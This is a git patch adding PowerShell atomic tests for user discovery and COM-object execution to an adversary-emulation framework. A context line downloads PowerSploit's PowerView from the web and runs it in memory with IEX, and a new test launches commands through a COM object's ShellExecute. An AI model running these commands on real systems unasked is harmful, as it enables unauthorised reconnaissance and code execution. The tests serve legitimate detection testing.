From a41a63ffd963011c6628c9895ebdcc29c0b60a5f Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Wed, 23 Mar 2022 18:44:16 +0100 Subject: [PATCH] Powershell tactics (#1825) * Update T1112.yaml * Update T1112.yaml * typos * Update T1033.yaml * Update T1033.yaml * Update T1546.015.yaml * Update T1546.015.yaml * Update T1033.yaml * Update T1546.015.yaml * Update T1546.015.yaml * Update T1546.015.yaml Co-authored-by: Carrie Roberts --- atomics/T1033/T1033.yaml | 23 +++++++++++++++++++++++ atomics/T1546.015/T1546.015.yaml | 14 ++++++++++++++ 2 files changed, 37 insertions(+) diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index ce81d0b9..b7889c4b 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -51,3 +51,26 @@ atomic_tests: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell +- name: User Discovery With Env Vars PowerShell Script + auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 + description: Use the PowerShell environment variables to identify the current logged user. + supported_platforms: + - windows + executor: + command: | + [System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt + $env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append + cleanup_command: | + Remove-Item -Path .\CurrentactiveUser.txt -Force + name: powershell +- name: GetCurrent User with PowerShell Script + auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b + description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user. + supported_platforms: + - windows + executor: + command: | + [System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt + cleanup_command: | + Remove-Item -Path .\CurrentUserObject.txt -Force + name: powershell diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index de7f79c0..b0d9caff 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -40,3 +40,17 @@ atomic_tests: cleanup_command: |- Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell +- name: Powershell Execute COM Object + auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb + description: Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + supported_platforms: + - windows + executor: + command: | + $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) + $item = $o.Item() + $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) + cleanup_command: | + Get-Process -Name "*calc" | Stop-Process + name: powershell